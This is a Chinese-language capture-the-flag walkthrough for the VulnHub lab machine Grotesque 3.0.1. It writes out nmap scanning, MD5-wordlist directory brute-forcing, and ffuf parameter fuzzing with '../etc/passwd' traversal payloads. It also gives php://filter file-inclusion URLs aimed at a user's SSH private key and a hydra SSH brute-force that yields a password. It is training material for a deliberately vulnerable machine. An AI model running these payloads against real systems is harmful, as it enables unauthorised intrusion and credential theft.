vulnhub靶场之GROTESQUE: 3.0.1

标签：10.4 .. GROTESQUE freddie vulnhub 3.0 靶机 172.20 ssh

准备：

攻击机：虚拟机kali、本机win10。

靶机：Grotesque: 3.0.1，下载地址：https://download.vulnhub.com/grotesque/grotesque3.zip，下载后直接vbox打开即可。

知识点：ffuf参数爆破、定时任务、445端口利用、smbclient使用。

信息收集：

通过nmap扫描下网段内的存活主机地址，确定下靶机的地址：nmap -sn 172.20.10.0/24，获得靶机地址：172.20.10.4。

扫描下端口对应的服务：nmap -T4 -sV -p- -A 172.20.10.4，显示开放了22、80端口，开启了ssh、http服务

目录扫描：

使用dirmap进行目录扫描，发现atlasg.jpg图片，emmmm，访问80端口的时候也能直接查看到该图片。

查看该图片利用steghide尝试获取隐藏信息，但是获取失败，后来发现一个提示信息：m、d和五个x，应该是告诉我们和md5有关。

根据提示生成一个md5字典，这里我们将/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt字典进行md5加密，命令：for i in $(cat directory-list-lowercase-2.3-medium.txt); do echo $i | md5sum >> dirmd5.txt; done。记得替换里面的横线和空格。然后使用gobuster进行目录扫描，发现：/f66b22bf020334b04c7d0d3eb5010391.php。

参数名爆破：

访问：http://172.20.10.4/f66b22bf020334b04c7d0d3eb5010391.php无任何回显信息，源代码信息中也无任何信息。因此尝试使用ffuf进行参数爆破，命令：fuzf -f -u 'http://172.20.10.4/f66b22bf020334b04c7d0d3eb5010391.php?FUZZ=../../../../../../etc/passwd' -w /usr/share/seclists/Discovery/Web-Content/common.txt，但是未扫描出来，然后更换字典，命令：ffuf -u 'http://172.20.10.4/f66b22bf020334b04c7d0d3eb5010391.php?FUZZ=../../../../../../etc/passwd' -w /usr/share/wordlists/dirb/big.txt，发现了参数名：purpose。

爆破ssh密码：

读取/etc/passwd文件，发现账户名：freddie。

使用文件包含漏洞读取下ssh私匙和公匙均读取失败，命令：http://172.20.10.4/f66b22bf020334b04c7d0d3eb5010391.php?purpose=php://filter/read=convert.base64-encode/resource=/home/freddie/.ssh/id_rsa和http://172.20.10.4/f66b22bf020334b04c7d0d3eb5010391.php?purpose=php://filter/read=convert.base64-encode/resource=/home/freddie/.ssh/id_rsa.pub，然后尝试下使用md5字典爆破下ssh密码，命令：hydra -l freddie -P dirmd5.txt ssh://172.20.10.4，成功获得freddie账户的ssh登录密码：61a4e3e60c063d1e472dd780f64e6cad。